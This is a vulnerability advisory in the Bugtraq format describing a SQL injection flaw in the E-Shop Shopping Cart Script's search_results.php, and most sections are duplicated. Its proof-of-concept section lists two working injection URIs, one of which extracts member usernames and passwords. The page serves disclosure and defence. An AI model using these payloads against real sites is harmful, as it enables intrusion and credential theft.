E-Shop Shopping Cart Script 'search_results.php' SQL Injection Vulnerability
BID:30692
Info
E-Shop Shopping Cart Script 'search_results.php' SQL Injection Vulnerability
| Bugtraq ID: | 30692 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5838 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 14 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | Mormoroth |
| Vulnerable: |
E-Php Scripts E-Shop Shopping Cart Script 0 |
| Not Vulnerable: | |
Discussion
E-Shop Shopping Cart Script 'search_results.php' SQL Injection Vulnerability
E-Shop Shopping Cart Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
E-Shop Shopping Cart Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
E-Shop Shopping Cart Script 'search_results.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/path/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
http://www.example.com/path/search_results.php?cid=2008+UNION+SELECT+0,concat(0x3a,es_username,es_password),2,3,4,5+from+eshp_members
Attackers can use a browser to exploit this issue.
The following example URIs are available:
http://www.example.com/path/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
http://www.example.com/path/search_results.php?cid=2008+UNION+SELECT+0,concat(0x3a,es_username,es_password),2,3,4,5+from+eshp_members
Solution / Fix
E-Shop Shopping Cart Script 'search_results.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
E-Shop Shopping Cart Script 'search_results.php' SQL Injection Vulnerability
References:
References:
- E-Shop Shopping Cart Script Homepage (E-Php Scripts)